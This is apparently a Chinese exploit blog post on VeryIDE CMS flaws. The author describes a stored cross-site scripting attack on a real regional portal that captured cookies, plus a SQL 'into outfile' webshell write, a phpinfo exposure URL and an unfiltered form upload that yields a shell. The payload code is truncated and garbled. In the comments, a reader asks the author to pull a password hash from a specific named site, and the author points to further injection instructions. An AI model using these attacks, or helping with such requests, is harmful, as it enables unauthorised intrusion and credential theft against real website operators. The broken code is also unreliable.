VeryIDE各种问题

1.存储型跨站: 当时我在尝试渗透我们这的的地方门户,发现bbs有个调查问卷,我便随便插了个跨站代码,结果收到了cookie。 [php][/php] 指定表单地址插入 [php] function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i' into outfile 'x:/yourpath/1.php';[/php] ,本机测试成功,当然实际测试的时候有的当前的mysql权限较小不成功。在第三点提到的,当我们获得数据库信息时,如果目标开启了数据库外联,也有可能拿到wenshell。 通过[php]http://0day5.com/module/system/system.server.php?action=phpinfo[/php]可以得知当前的phpinfo 5.漏网之鱼。veryide的后台其他安全做的不错,上传过滤的不错,可是却在生成表单时出了问题,当表单里有上传动能时,那就要恭喜你,没有过滤,you can getshell 可是怎么获得shell路径了?那就要感谢后台贴心的安全功能模块了,扫描webshell即可,--

3 条评论

  1. Zoom

    求获得账号密码注入语句 谢谢

    1. 0day5
      @Zoom

      参照
      http://fuck.0day5.com/?p=603
      里面的方式

      1. Zoom
        @0day5

        http://ide.eyuyao.com/module/form/content/?mode=&id=76 能帮我搞下吗 给我password的md5吧 拜谢

发表评论